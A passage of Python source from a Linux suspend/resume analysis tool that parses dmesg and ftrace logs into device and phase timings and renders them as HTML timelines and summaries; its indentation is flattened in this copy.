data.dmesg['resume_machine']['end'] = t.time
continue
# resume_early start
elif(re.match('dpm_resume_early\[.*', t.name)):
phase = 'resume_early'
data.setPhase(phase, t.time, isbegin)
continue
# resume start
elif(re.match('dpm_resume\[.*', t.name)):
phase = 'resume'
data.setPhase(phase, t.time, isbegin)
continue
# resume complete start
elif(re.match('dpm_complete\[.*', t.name)):
phase = 'resume_complete'
if(isbegin):
data.dmesg[phase]['start'] = t.time
continue
# is this trace event outside of the devices calls
if(data.isTraceEventOutsideDeviceCalls(pid, t.time)):
# global events (outside device calls) are simply graphed
if(name not in testrun.ttemp):
testrun.ttemp[name] = []
if(isbegin):
# create a new list entry
testrun.ttemp[name].append(\
{'begin': t.time, 'end': t.time})
else:
if(len(testrun.ttemp[name]) > 0):
# if an antry exists, assume this is its end
testrun.ttemp[name][-1]['end'] = t.time
elif(phase == 'post_resume'):
# post resume events can just have ends
testrun.ttemp[name].append({
'begin': data.dmesg[phase]['start'],
'end': t.time})
else:
if(isbegin):
data.addIntraDevTraceEvent('', name, pid, t.time)
else:
data.capIntraDevTraceEvent('', name, pid, t.time)
# device callback start
elif(t.type == 'device_pm_callback_start'):
m = re.match('(?P<drv>.*) (?P<d>.*), parent: *(?P<p>.*), .*',\
t.name);
if(not m):
continue
drv = m.group('drv')
n = m.group('d')
p = m.group('p')
if(n and p):
data.newAction(phase, n, pid, p, t.time, -1, drv)
# device callback finish
elif(t.type == 'device_pm_callback_end'):
m = re.match('(?P<drv>.*) (?P<d>.*), err.*', t.name);
if(not m):
continue
n = m.group('d')
list = data.dmesg[phase]['list']
if(n in list):
dev = list[n]
dev['length'] = t.time - dev['start']
dev['end'] = t.time
# callgraph processing
elif sysvals.usecallgraph:
# this shouldn't happen, but JIC, ignore callgraph data post-res
if(phase == 'post_resume'):
continue
# create a callgraph object for the data
if(pid not in testrun.ftemp):
testrun.ftemp[pid] = []
testrun.ftemp[pid].append(FTraceCallGraph())
# when the call is finished, see which device matches it
cg = testrun.ftemp[pid][-1]
if(cg.addLine(t, m)):
testrun.ftemp[pid].append(FTraceCallGraph())
tf.close()
for test in testruns:
# add the traceevent data to the device hierarchy
if(sysvals.usetraceevents):
for name in test.ttemp:
for event in test.ttemp[name]:
begin = event['begin']
end = event['end']
# if event starts before timeline start, expand timeline
if(begin < test.data.start):
test.data.setStart(begin)
# if event ends after timeline end, expand the timeline
if(end > test.data.end):
test.data.setEnd(end)
test.data.newActionGlobal(name, begin, end)
# add the callgraph data to the device hierarchy
borderphase = {
'dpm_prepare': 'suspend_prepare',
'dpm_complete': 'resume_complete'
}
for pid in test.ftemp:
for cg in test.ftemp[pid]:
if len(cg.list) < 2:
continue
if(not cg.sanityCheck()):
id = 'task %s cpu %s' % (pid, m.group('cpu'))
vprint('Sanity check failed for '+\
id+', ignoring this callback')
continue
callstart = cg.start
callend = cg.end
if(cg.list[0].name in borderphase):
p = borderphase[cg.list[0].name]
list = test.data.dmesg[p]['list']
for devname in list:
dev = list[devname]
if(pid == dev['pid'] and
callstart <= dev['start'] and
callend >= dev['end']):
dev['ftrace'] = cg.slice(dev['start'], dev['end'])
continue
if(cg.list[0].name != 'dpm_run_callback'):
continue
for p in test.data.phases:
if(test.data.dmesg[p]['start'] <= callstart and
callstart <= test.data.dmesg[p]['end']):
list = test.data.dmesg[p]['list']
for devname in list:
dev = list[devname]
if(pid == dev['pid'] and
callstart <= dev['start'] and
callend >= dev['end']):
dev['ftrace'] = cg
break
# fill in any missing phases
for data in testdata:
lp = data.phases[0]
for p in data.phases:
if(data.dmesg[p]['start'] < 0 and data.dmesg[p]['end'] < 0):
print('WARNING: phase "%s" is missing!' % p)
if(data.dmesg[p]['start'] < 0):
data.dmesg[p]['start'] = data.dmesg[lp]['end']
if(p == 'resume_machine'):
data.tSuspended = data.dmesg[lp]['end']
data.tResumed = data.dmesg[lp]['end']
data.tLow = 0
if(data.dmesg[p]['end'] < 0):
data.dmesg[p]['end'] = data.dmesg[p]['start']
lp = p
if(len(sysvals.devicefilter) > 0):
data.deviceFilter(sysvals.devicefilter)
data.fixupInitcallsThatDidntReturn()
if(sysvals.verbose):
data.printDetails()
# add the time in between the tests as a new phase so we can see it
if(len(testdata) > 1):
t1e = testdata[0].getEnd()
t2s = testdata[-1].getStart()
testdata[-1].newPhaseWithSingleAction('user mode', \
'user mode', t1e, t2s, '#FF9966')
return testdata
# Function: loadKernelLog
# Description:
# [deprecated for kernel 3.15.0 or newer]
# load the dmesg file into memory and fix up any ordering issues
# The dmesg filename is taken from sysvals
# Output:
# An array of empty Data objects with only their dmesgtext attributes set
def loadKernelLog():
global sysvals
vprint('Analyzing the dmesg data...')
if(os.path.exists(sysvals.dmesgfile) == False):
doError('%s doesnt exist' % sysvals.dmesgfile, False)
# there can be multiple test runs in a single file delineated by stamps
testruns = []
data = 0
lf = open(sysvals.dmesgfile, 'r')
for line in lf:
line = line.replace('\r\n', '')
idx = line.find('[')
if idx > 1:
line = line[idx:]
m = re.match(sysvals.stampfmt, line)
if(m):
if(data):
testruns.append(data)
data = Data(len(testruns))
parseStamp(m, data)
continue
if(not data):
continue
m = re.match(sysvals.firmwarefmt, line)
if(m):
data.fwSuspend = int(m.group('s'))
data.fwResume = int(m.group('r'))
if(data.fwSuspend > 0 or data.fwResume > 0):
data.fwValid = True
continue
m = re.match('[ \t]*(\[ *)(?P<ktime>[0-9\.]*)(\]) (?P<msg>.*)', line)
if(m):
data.dmesgtext.append(line)
if(re.match('ACPI: resume from mwait', m.group('msg'))):
print('NOTE: This suspend appears to be freeze rather than'+\
' %s, it will be treated as such' % sysvals.suspendmode)
sysvals.suspendmode = 'freeze'
else:
vprint('ignoring dmesg line: %s' % line.replace('\n', ''))
testruns.append(data)
lf.close()
if(not data):
print('ERROR: analyze_suspend header missing from dmesg log')
sys.exit()
# fix lines with same timestamp/function with the call and return swapped
for data in testruns:
last = ''
for line in data.dmesgtext:
mc = re.match('.*(\[ *)(?P<t>[0-9\.]*)(\]) calling '+\
'(?P<f>.*)\+ @ .*, parent: .*', line)
mr = re.match('.*(\[ *)(?P<t>[0-9\.]*)(\]) call '+\
'(?P<f>.*)\+ returned .* after (?P<dt>.*) usecs', last)
if(mc and mr and (mc.group('t') == mr.group('t')) and
(mc.group('f') == mr.group('f'))):
i = data.dmesgtext.index(last)
j = data.dmesgtext.index(line)
data.dmesgtext[i] = line
data.dmesgtext[j] = last
last = line
return testruns
# Function: parseKernelLog
# Description:
# [deprecated for kernel 3.15.0 or newer]
# Analyse a dmesg log output file generated from this app during
# the execution phase. Create a set of device structures in memory
# for subsequent formatting in the html output file
# This call is only for legacy support on kernels where the ftrace
# data lacks the suspend_resume or device_pm_callbacks trace events.
# Arguments:
# data: an empty Data object (with dmesgtext) obtained from loadKernelLog
# Output:
# The filled Data object
def parseKernelLog(data):
global sysvals
phase = 'suspend_runtime'
if(data.fwValid):
vprint('Firmware Suspend = %u ns, Firmware Resume = %u ns' % \
(data.fwSuspend, data.fwResume))
# dmesg phase match table
dm = {
'suspend_prepare': 'PM: Syncing filesystems.*',
'suspend': 'PM: Entering [a-z]* sleep.*',
'suspend_late': 'PM: suspend of devices complete after.*',
'suspend_noirq': 'PM: late suspend of devices complete after.*',
'suspend_machine': 'PM: noirq suspend of devices complete after.*',
'resume_machine': 'ACPI: Low-level resume complete.*',
'resume_noirq': 'ACPI: Waking up from system sleep state.*',
'resume_early': 'PM: noirq resume of devices complete after.*',
'resume': 'PM: early resume of devices complete after.*',
'resume_complete': 'PM: resume of devices complete after.*',
'post_resume': '.*Restarting tasks \.\.\..*',
}
if(sysvals.suspendmode == 'standby'):
dm['resume_machine'] = 'PM: Restoring platform NVS memory'
elif(sysvals.suspendmode == 'disk'):
dm['suspend_late'] = 'PM: freeze of devices complete after.*'
dm['suspend_noirq'] = 'PM: late freeze of devices complete after.*'
dm['suspend_machine'] = 'PM: noirq freeze of devices complete after.*'
dm['resume_machine'] = 'PM: Restoring platform NVS memory'
dm['resume_early'] = 'PM: noirq restore of devices complete after.*'
dm['resume'] = 'PM: early restore of devices complete after.*'
dm['resume_complete'] = 'PM: restore of devices complete after.*'
elif(sysvals.suspendmode == 'freeze'):
dm['resume_machine'] = 'ACPI: resume from mwait'
# action table (expected events that occur and show up in dmesg)
at = {
'sync_filesystems': {
'smsg': 'PM: Syncing filesystems.*',
'emsg': 'PM: Preparing system for mem sleep.*' },
'freeze_user_processes': {
'smsg': 'Freezing user space processes .*',
'emsg': 'Freezing remaining freezable tasks.*' },
'freeze_tasks': {
'smsg': 'Freezing remaining freezable tasks.*',
'emsg': 'PM: Entering (?P<mode>[a-z,A-Z]*) sleep.*' },
'ACPI prepare': {
'smsg': 'ACPI: Preparing to enter system sleep state.*',
'emsg': 'PM: Saving platform NVS memory.*' },
'PM vns': {
'smsg': 'PM: Saving platform NVS memory.*',
'emsg': 'Disabling non-boot CPUs .*' },
}
t0 = -1.0
cpu_start = -1.0
prevktime = -1.0
actions = dict()
for line in data.dmesgtext:
# -- preprocessing --
# parse each dmesg line into the time and message
m = re.match('[ \t]*(\[ *)(?P<ktime>[0-9\.]*)(\]) (?P<msg>.*)', line)
if(m):
val = m.group('ktime')
try:
ktime = float(val)
except:
doWarning('INVALID DMESG LINE: '+\
line.replace('\n', ''), 'dmesg')
continue
msg = m.group('msg')
# initialize data start to first line time
if t0 < 0:
data.setStart(ktime)
t0 = ktime
else:
continue
# hack for determining resume_machine end for freeze
if(not sysvals.usetraceevents and sysvals.suspendmode == 'freeze' \
and phase == 'resume_machine' and \
re.match('calling (?P<f>.*)\+ @ .*, parent: .*', msg)):
data.dmesg['resume_machine']['end'] = ktime
phase = 'resume_noirq'
data.dmesg[phase]['start'] = ktime
# -- phase changes --
# suspend start
if(re.match(dm['suspend_prepare'], msg)):
phase = 'suspend_prepare'
data.dmesg[phase]['start'] = ktime
data.setStart(ktime)
# suspend start
elif(re.match(dm['suspend'], msg)):
data.dmesg['suspend_prepare']['end'] = ktime
phase = 'suspend'
data.dmesg[phase]['start'] = ktime
# suspend_late start
elif(re.match(dm['suspend_late'], msg)):
data.dmesg['suspend']['end'] = ktime
phase = 'suspend_late'
data.dmesg[phase]['start'] = ktime
# suspend_noirq start
elif(re.match(dm['suspend_noirq'], msg)):
data.dmesg['suspend_late']['end'] = ktime
phase = 'suspend_noirq'
data.dmesg[phase]['start'] = ktime
# suspend_machine start
elif(re.match(dm['suspend_machine'], msg)):
data.dmesg['suspend_noirq']['end'] = ktime
phase = 'suspend_machine'
data.dmesg[phase]['start'] = ktime
# resume_machine start
elif(re.match(dm['resume_machine'], msg)):
if(sysvals.suspendmode in ['freeze', 'standby']):
data.tSuspended = prevktime
data.dmesg['suspend_machine']['end'] = prevktime
else:
data.tSuspended = ktime
data.dmesg['suspend_machine']['end'] = ktime
phase = 'resume_machine'
data.tResumed = ktime
data.tLow = data.tResumed - data.tSuspended
data.dmesg[phase]['start'] = ktime
# resume_noirq start
elif(re.match(dm['resume_noirq'], msg)):
data.dmesg['resume_machine']['end'] = ktime
phase = 'resume_noirq'
data.dmesg[phase]['start'] = ktime
# resume_early start
elif(re.match(dm['resume_early'], msg)):
data.dmesg['resume_noirq']['end'] = ktime
phase = 'resume_early'
data.dmesg[phase]['start'] = ktime
# resume start
elif(re.match(dm['resume'], msg)):
data.dmesg['resume_early']['end'] = ktime
phase = 'resume'
data.dmesg[phase]['start'] = ktime
# resume complete start
elif(re.match(dm['resume_complete'], msg)):
data.dmesg['resume']['end'] = ktime
phase = 'resume_complete'
data.dmesg[phase]['start'] = ktime
# post resume start
elif(re.match(dm['post_resume'], msg)):
data.dmesg['resume_complete']['end'] = ktime
data.setEnd(ktime)
phase = 'post_resume'
break
# -- device callbacks --
if(phase in data.phases):
# device init call
if(re.match('calling (?P<f>.*)\+ @ .*, parent: .*', msg)):
sm = re.match('calling (?P<f>.*)\+ @ '+\
'(?P<n>.*), parent: (?P<p>.*)', msg);
f = sm.group('f')
n = sm.group('n')
p = sm.group('p')
if(f and n and p):
data.newAction(phase, f, int(n), p, ktime, -1, '')
# device init return
elif(re.match('call (?P<f>.*)\+ returned .* after '+\
'(?P<t>.*) usecs', msg)):
sm = re.match('call (?P<f>.*)\+ returned .* after '+\
'(?P<t>.*) usecs(?P<a>.*)', msg);
f = sm.group('f')
t = sm.group('t')
list = data.dmesg[phase]['list']
if(f in list):
dev = list[f]
dev['length'] = int(t)
dev['end'] = ktime
# -- non-devicecallback actions --
# if trace events are not available, these are better than nothing
if(not sysvals.usetraceevents):
# look for known actions
for a in at:
if(re.match(at[a]['smsg'], msg)):
if(a not in actions):
actions[a] = []
actions[a].append({'begin': ktime, 'end': ktime})
if(re.match(at[a]['emsg'], msg)):
actions[a][-1]['end'] = ktime
# now look for CPU on/off events
if(re.match('Disabling non-boot CPUs .*', msg)):
# start of first cpu suspend
cpu_start = ktime
elif(re.match('Enabling non-boot CPUs .*', msg)):
# start of first cpu resume
cpu_start = ktime
elif(re.match('smpboot: CPU (?P<cpu>[0-9]*) is now offline', msg)):
# end of a cpu suspend, start of the next
m = re.match('smpboot: CPU (?P<cpu>[0-9]*) is now offline', msg)
cpu = 'CPU'+m.group('cpu')
if(cpu not in actions):
actions[cpu] = []
actions[cpu].append({'begin': cpu_start, 'end': ktime})
cpu_start = ktime
elif(re.match('CPU(?P<cpu>[0-9]*) is up', msg)):
# end of a cpu resume, start of the next
m = re.match('CPU(?P<cpu>[0-9]*) is up', msg)
cpu = 'CPU'+m.group('cpu')
if(cpu not in actions):
actions[cpu] = []
actions[cpu].append({'begin': cpu_start, 'end': ktime})
cpu_start = ktime
prevktime = ktime
# fill in any missing phases
lp = data.phases[0]
for p in data.phases:
if(data.dmesg[p]['start'] < 0 and data.dmesg[p]['end'] < 0):
print('WARNING: phase "%s" is missing, something went wrong!' % p)
print(' In %s, this dmesg line denotes the start of %s:' % \
(sysvals.suspendmode, p))
print(' "%s"' % dm[p])
if(data.dmesg[p]['start'] < 0):
data.dmesg[p]['start'] = data.dmesg[lp]['end']
if(p == 'resume_machine'):
data.tSuspended = data.dmesg[lp]['end']
data.tResumed = data.dmesg[lp]['end']
data.tLow = 0
if(data.dmesg[p]['end'] < 0):
data.dmesg[p]['end'] = data.dmesg[p]['start']
lp = p
# fill in any actions we've found
for name in actions:
for event in actions[name]:
begin = event['begin']
end = event['end']
# if event starts before timeline start, expand timeline
if(begin < data.start):
data.setStart(begin)
# if event ends after timeline end, expand the timeline
if(end > data.end):
data.setEnd(end)
data.newActionGlobal(name, begin, end)
if(sysvals.verbose):
data.printDetails()
if(len(sysvals.devicefilter) > 0):
data.deviceFilter(sysvals.devicefilter)
data.fixupInitcallsThatDidntReturn()
return True
# Function: setTimelineRows
# Description:
# Organize the timeline entries into the smallest
# number of rows possible, with no entry overlapping
# Arguments:
# list: the list of devices/actions for a single phase
# sortedkeys: cronologically sorted key list to use
# Output:
# The total number of rows needed to display this phase of the timeline
def setTimelineRows(list, sortedkeys):
# clear all rows and set them to undefined
remaining = len(list)
rowdata = dict()
row = 0
for item in list:
list[item]['row'] = -1
# try to pack each row with as many ranges as possible
while(remaining > 0):
if(row not in rowdata):
rowdata[row] = []
for item in sortedkeys:
if(list[item]['row'] < 0):
s = list[item]['start']
e = list[item]['end']
valid = True
for ritem in rowdata[row]:
rs = ritem['start']
re = ritem['end']
if(not (((s <= rs) and (e <= rs)) or
((s >= re) and (e >= re)))):
valid = False
break
if(valid):
rowdata[row].append(list[item])
list[item]['row'] = row
remaining -= 1
row += 1
return row
# Function: createTimeScale
# Description:
# Create the timescale header for the html timeline
# Arguments:
# t0: start time (suspend begin)
# tMax: end time (resume end)
# tSuspend: time when suspend occurs, i.e. the zero time
# Output:
# The html code needed to display the time scale
def createTimeScale(t0, tMax, tSuspended):
timescale = '<div class="t" style="right:{0}%">{1}</div>\n'
output = '<div id="timescale">\n'
# set scale for timeline
tTotal = tMax - t0
tS = 0.1
if(tTotal <= 0):
return output
if(tTotal > 4):
tS = 1
if(tSuspended < 0):
for i in range(int(tTotal/tS)+1):
pos = '%0.3f' % (100 - ((float(i)*tS*100)/tTotal))
if(i > 0):
val = '%0.fms' % (float(i)*tS*1000)
else:
val = ''
output += timescale.format(pos, val)
else:
tSuspend = tSuspended - t0
divTotal = int(tTotal/tS) + 1
divSuspend = int(tSuspend/tS)
s0 = (tSuspend - tS*divSuspend)*100/tTotal
for i in range(divTotal):
pos = '%0.3f' % (100 - ((float(i)*tS*100)/tTotal) - s0)
if((i == 0) and (s0 < 3)):
val = ''
elif(i == divSuspend):
val = 'S/R'
else:
val = '%0.fms' % (float(i-divSuspend)*tS*1000)
output += timescale.format(pos, val)
output += '</div>\n'
return output
# Function: createHTMLSummarySimple
# Description:
# Create summary html file for a series of tests
# Arguments:
# testruns: array of Data objects from parseTraceLog
def createHTMLSummarySimple(testruns, htmlfile):
global sysvals
# print out the basic summary of all the tests
hf = open(htmlfile, 'w')
# write the html header first (html head, css code, up to body start)
html = '<!DOCTYPE html>\n<html>\n<head>\n\
<meta http-equiv="content-type" content="text/html; charset=UTF-8">\n\
<title>AnalyzeSuspend Summary</title>\n\
<style type=\'text/css\'>\n\
body {overflow-y: scroll;}\n\
.stamp {width: 100%;text-align:center;background-color:#495E09;line-height:30px;color:white;font: 25px Arial;}\n\
table {width:100%;border-collapse: collapse;}\n\
.summary {font: 22px Arial;border:1px solid;}\n\
th {border: 1px solid black;background-color:#A7C942;color:white;}\n\
td {text-align: center;}\n\
tr.alt td {background-color:#EAF2D3;}\n\
tr.avg td {background-color:#BDE34C;}\n\
a:link {color: #90B521;}\n\
a:visited {color: #495E09;}\n\
a:hover {color: #B1DF28;}\n\
a:active {color: #FFFFFF;}\n\
</style>\n</head>\n<body>\n'
# group test header
count = len(testruns)
headline_stamp = '<div class="stamp">{0} {1} {2} {3} ({4} tests)</div>\n'
html += headline_stamp.format(sysvals.stamp['host'],
sysvals.stamp['kernel'], sysvals.stamp['mode'],
sysvals.stamp['time'], count)
# check to see if all the tests have the same value
stampcolumns = False
for data in testruns:
if diffStamp(sysvals.stamp, data.stamp):
stampcolumns = True
break
th = '\t<th>{0}</th>\n'
td = '\t<td>{0}</td>\n'
tdlink = '\t<td><a href="{0}">Click Here</a></td>\n'
# table header
html += '<table class="summary">\n<tr>\n'
html += th.format("Test #")
if stampcolumns:
html += th.format("Hostname")
html += th.format("Kernel Version")
html += th.format("Suspend Mode")
html += th.format("Test Time")
html += th.format("Suspend Time")
html += th.format("Resume Time")
html += th.format("Detail")
html += '</tr>\n'
# test data, 1 row per test
sTimeAvg = 0.0
rTimeAvg = 0.0
num = 1
for data in testruns:
# data.end is the end of post_resume
resumeEnd = data.dmesg['resume_complete']['end']
if num % 2 == 1:
html += '<tr class="alt">\n'
else:
html += '<tr>\n'
# test num
html += td.format("test %d" % num)
num += 1
if stampcolumns:
# host name
val = "unknown"
if('host' in data.stamp):
val = data.stamp['host']
html += td.format(val)
# host kernel
val = "unknown"
if('kernel' in data.stamp):
val = data.stamp['kernel']
html += td.format(val)
# suspend mode
val = "unknown"
if('mode' in data.stamp):
val = data.stamp['mode']
html += td.format(val)
# test time
val = "unknown"
if('time' in data.stamp):
val = data.stamp['time']
html += td.format(val)
# suspend time
sTime = (data.tSuspended - data.start)*1000
sTimeAvg += sTime
html += td.format("%3.3f ms" % sTime)
# resume time
rTime = (resumeEnd - data.tResumed)*1000
rTimeAvg += rTime
html += td.format("%3.3f ms" % rTime)
# link to the output html
html += tdlink.format(data.outfile)
html += '</tr>\n'
# last line: test average
if(count > 0):
sTimeAvg /= count
rTimeAvg /= count
html += '<tr class="avg">\n'
html += td.format('Average') # name
if stampcolumns:
html += td.format('') # host
html += td.format('') # kernel
html += td.format('') # mode
html += td.format('') # time
html += td.format("%3.3f ms" % sTimeAvg) # suspend time
html += td.format("%3.3f ms" % rTimeAvg) # resume time
html += td.format('') # output link
html += '</tr>\n'
# flush the data to file
hf.write(html+'</table>\n')
hf.write('</body>\n</html>\n')
hf.close()
# Function: createHTML
# Description:
# Create the output html file from the resident test data
# Arguments:
# testruns: array of Data objects from parseKernelLog or parseTraceLog
# Output:
# True if the html file was created, false if it failed
def createHTML(testruns):
global sysvals
for data in testruns:
data.normalizeTime(testruns[-1].tSuspended)
x2changes = ['', 'absolute']
if len(testruns) > 1:
x2changes = ['1', 'relative']
# html function templates
headline_stamp = '<div class="stamp">{0} {1} {2} {3}</div>\n'
html_devlist1 = '<button id="devlist1" class="devlist" style="float:left;">Device Detail%s</button>' % x2changes[0]
html_zoombox = '<center><button id="zoomin">ZOOM IN</button><button id="zoomout">ZOOM OUT</button><button id="zoomdef">ZOOM 1:1</button></center>\n'
html_devlist2 = '<button id="devlist2" class="devlist" style="float:right;">Device Detail2</button>\n'
html_timeline = '<div id="dmesgzoombox" class="zoombox">\n<div id="{0}" class="timeline" style="height:{1}px">\n'
html_device = '<div id="{0}" title="{1}" class="thread" style="left:{2}%;top:{3}%;height:{4}%;width:{5}%;">{6}</div>\n'
html_traceevent = '<div title="{0}" class="traceevent" style="left:{1}%;top:{2}%;height:{3}%;width:{4}%;border:1px solid {5};background-color:{5}">{6}</div>\n'
html_phase = '<div class="phase" style="left:{0}%;width:{1}%;top:{2}%;height:{3}%;background-color:{4}">{5}</div>\n'
html_phaselet = '<div id="{0}" class="phaselet" style="left:{1}%;width:{2}%;background-color:{3}"></div>\n'
html_legend = '<div class="square" style="left:{0}%;background-color:{1}"> {2}</div>\n'
html_timetotal = '<table class="time1">\n<tr>'\
'<td class="green">{2} Suspend Time: <b>{0} ms</b></td>'\
'<td class="yellow">{2} Resume Time: <b>{1} ms</b></td>'\
'</tr>\n</table>\n'
html_timetotal2 = '<table class="time1">\n<tr>'\
'<td class="green">{3} Suspend Time: <b>{0} ms</b></td>'\
'<td class="gray">'+sysvals.suspendmode+' time: <b>{1} ms</b></td>'\
'<td class="yellow">{3} Resume Time: <b>{2} ms</b></td>'\
'</tr>\n</table>\n'
html_timegroups = '<table class="time2">\n<tr>'\
'<td class="green">{4}Kernel Suspend: {0} ms</td>'\
'<td class="purple">{4}Firmware Suspend: {1} ms</td>'\
'<td class="purple">{4}Firmware Resume: {2} ms</td>'\
'<td class="yellow">{4}Kernel Resume: {3} ms</td>'\
'</tr>\n</table>\n'
# device timeline
vprint('Creating Device Timeline...')
devtl = Timeline()
# Generate the header for this timeline
textnum = ['First', 'Second']
for data in testruns:
tTotal = data.end - data.start
tEnd = data.dmesg['resume_complete']['end']
if(tTotal == 0):
print('ERROR: No timeline data')
sys.exit()
if(data.tLow > 0):
low_time = '%.0f'%(data.tLow*1000)
if data.fwValid:
suspend_time = '%.0f'%((data.tSuspended-data.start)*1000 + \
(data.fwSuspend/1000000.0))
resume_time = '%.0f'%((tEnd-data.tSuspended)*1000 + \
(data.fwResume/1000000.0))
testdesc1 = 'Total'
testdesc2 = ''
if(len(testruns) > 1):
testdesc1 = testdesc2 = textnum[data.testnumber]
testdesc2 += ' '
if(data.tLow == 0):
thtml = html_timetotal.format(suspend_time, \
resume_time, testdesc1)
else:
thtml = html_timetotal2.format(suspend_time, low_time, \
resume_time, testdesc1)
devtl.html['timeline'] += thtml
sktime = '%.3f'%((data.dmesg['suspend_machine']['end'] - \
data.getStart())*1000)
sftime = '%.3f'%(data.fwSuspend / 1000000.0)
rftime = '%.3f'%(data.fwResume / 1000000.0)
rktime = '%.3f'%((data.getEnd() - \
data.dmesg['resume_machine']['start'])*1000)
devtl.html['timeline'] += html_timegroups.format(sktime, \
sftime, rftime, rktime, testdesc2)
else:
suspend_time = '%.0f'%((data.tSuspended-data.start)*1000)
resume_time = '%.0f'%((tEnd-data.tSuspended)*1000)
testdesc = 'Kernel'
if(len(testruns) > 1):
testdesc = textnum[data.testnumber]+' '+testdesc
if(data.tLow == 0):
thtml = html_timetotal.format(suspend_time, \
resume_time, testdesc)
else:
thtml = html_timetotal2.format(suspend_time, low_time, \
resume_time, testdesc)
devtl.html['timeline'] += thtml
# time scale for potentially multiple datasets
t0 = testruns[0].start
tMax = testruns[-1].end
tSuspended = testruns[-1].tSuspended
tTotal = tMax - t0
# determine the maximum number of rows we need to draw
timelinerows = 0
for data in testruns:
for phase in data.dmesg:
list = data.dmesg[phase]['list']
rows = setTimelineRows(list, list)
data.dmesg[phase]['row'] = rows
if(rows > timelinerows):
timelinerows = rows
# calculate the timeline height and create bounding box, add buttons
devtl.setRows(timelinerows + 1)
devtl.html['timeline'] += html_devlist1
if len(testruns) > 1:
devtl.html['timeline'] += html_devlist2
devtl.html['timeline'] += html_zoombox
devtl.html['timeline'] += html_timeline.format('dmesg', devtl.height)
# draw the colored boxes for each of the phases
for data in testruns:
for b in data.dmesg:
phase = data.dmesg[b]
length = phase['end']-phase['start']
left = '%.3f' % (((phase['start']-t0)*100.0)/tTotal)
width = '%.3f' % ((length*100.0)/tTotal)
devtl.html['timeline'] += html_phase.format(left, width, \
'%.3f'%devtl.scaleH, '%.3f'%(100-devtl.scaleH), \
data.dmesg[b]['color'], '')
# draw the time scale, try to make the number of labels readable
devtl.html['scale'] = createTimeScale(t0, tMax, tSuspended)
devtl.html['timeline'] += devtl.html['scale']
for data in testruns:
for b in data.dmesg:
phaselist = data.dmesg[b]['list']
for d in phaselist:
name = d
drv = ''
dev = phaselist[d]
if(d in sysvals.altdevname):
name = sysvals.altdevname[d]
if('drv' in dev and dev['drv']):
drv = ' {%s}' % dev['drv']
height = (100.0 - devtl.scaleH)/data.dmesg[b]['row']
top = '%.3f' % ((dev['row']*height) + devtl.scaleH)
left = '%.3f' % (((dev['start']-t0)*100)/tTotal)
width = '%.3f' % (((dev['end']-dev['start'])*100)/tTotal)
length = ' (%0.3f ms) ' % ((dev['end']-dev['start'])*1000)
color = 'rgba(204,204,204,0.5)'
devtl.html['timeline'] += html_device.format(dev['id'], \
d+drv+length+b, left, top, '%.3f'%height, width, name+drv)
# draw any trace events found
for data in testruns:
for b in data.dmesg:
phaselist = data.dmesg[b]['list']
for name in phaselist:
dev = phaselist[name]
if('traceevents' in dev):
vprint('Debug trace events found for device %s' % name)
vprint('%20s %20s %10s %8s' % ('action', \
'name', 'time(ms)', 'length(ms)'))
for e in dev['traceevents']:
vprint('%20s %20s %10.3f %8.3f' % (e.action, \
e.name, e.time*1000, e.length*1000))
height = (100.0 - devtl.scaleH)/data.dmesg[b]['row']
top = '%.3f' % ((dev['row']*height) + devtl.scaleH)
left = '%.3f' % (((e.time-t0)*100)/tTotal)
width = '%.3f' % (e.length*100/tTotal)
color = 'rgba(204,204,204,0.5)'
devtl.html['timeline'] += \
html_traceevent.format(e.action+' '+e.name, \
left, top, '%.3f'%height, \
width, e.color, '')
# timeline is finished
devtl.html['timeline'] += '</div>\n</div>\n'
# draw a legend which describes the phases by color
data = testruns[-1]
devtl.html['legend'] = '<div class="legend">\n'
pdelta = 100.0/len(data.phases)
pmargin = pdelta / 4.0
for phase in data.phases:
order = '%.2f' % ((data.dmesg[phase]['order'] * pdelta) + pmargin)
name = string.replace(phase, '_', ' ')
devtl.html['legend'] += html_legend.format(order, \
data.dmesg[phase]['color'], name)
devtl.html['legend'] += '</div>\n'
hf = open(sysvals.htmlfile, 'w')
thread_height = 0
# write the html header first (html head, css code, up to body start)
html_header = '<!DOCTYPE html>\n<html>\n<head>\n\
<meta http-equiv="content-type" content="text/html; charset=UTF-8">\n\
<title>AnalyzeSuspend</title>\n\
<style type=\'text/css\'>\n\
body {overflow-y: scroll;}\n\
.stamp {width: 100%;text-align:center;background-color:gray;line-height:30px;color:white;font: 25px Arial;}\n\
.callgraph {margin-top: 30px;box-shadow: 5px 5px 20px black;}\n\
.callgraph article * {padding-left: 28px;}\n\
h1 {color:black;font: bold 30px Times;}\n\
t0 {color:black;font: bold 30px Times;}\n\
t1 {color:black;font: 30px Times;}\n\
t2 {color:black;font: 25px Times;}\n\
t3 {color:black;font: 20px Times;white-space:nowrap;}\n\
t4 {color:black;font: bold 30px Times;line-height:60px;white-space:nowrap;}\n\
table {width:100%;}\n\
.gray {background-color:rgba(80,80,80,0.1);}\n\
.green {background-color:rgba(204,255,204,0.4);}\n\
.purple {background-color:rgba(128,0,128,0.2);}\n\
.yellow {background-color:rgba(255,255,204,0.4);}\n\
.time1 {font: 22px Arial;border:1px solid;}\n\
.time2 {font: 15px Arial;border-bottom:1px solid;border-left:1px solid;border-right:1px solid;}\n\
td {text-align: center;}\n\
r {color:#500000;font:15px Tahoma;}\n\
n {color:#505050;font:15px Tahoma;}\n\
.tdhl {color: red;}\n\
.hide {display: none;}\n\
.pf {display: none;}\n\
.pf:checked + label {background: url(\'data:image/svg+xml;utf,<?xml version="1.0" standalone="no"?><svg xmlns="http://www.w3.org/2000/svg" height="18" width="18" version="1.1"><circle cx="9" cy="9" r="8" stroke="black" stroke-width="1" fill="white"/><rect x="4" y="8" width="10" height="2" style="fill:black;stroke-width:0"/><rect x="8" y="4" width="2" height="10" style="fill:black;stroke-width:0"/></svg>\') no-repeat left center;}\n\
.pf:not(:checked) ~ label {background: url(\'data:image/svg+xml;utf,<?xml version="1.0" standalone="no"?><svg xmlns="http://www.w3.org/2000/svg" height="18" width="18" version="1.1"><circle cx="9" cy="9" r="8" stroke="black" stroke-width="1" fill="white"/><rect x="4" y="8" width="10" height="2" style="fill:black;stroke-width:0"/></svg>\') no-repeat left center;}\n\
.pf:checked ~ *:not(:nth-child(2)) {display: none;}\n\
.zoombox {position: relative; width: 100%; overflow-x: scroll;}\n\
.timeline {position: relative; font-size: 14px;cursor: pointer;width: 100%; overflow: hidden; background-color:#dddddd;}\n\
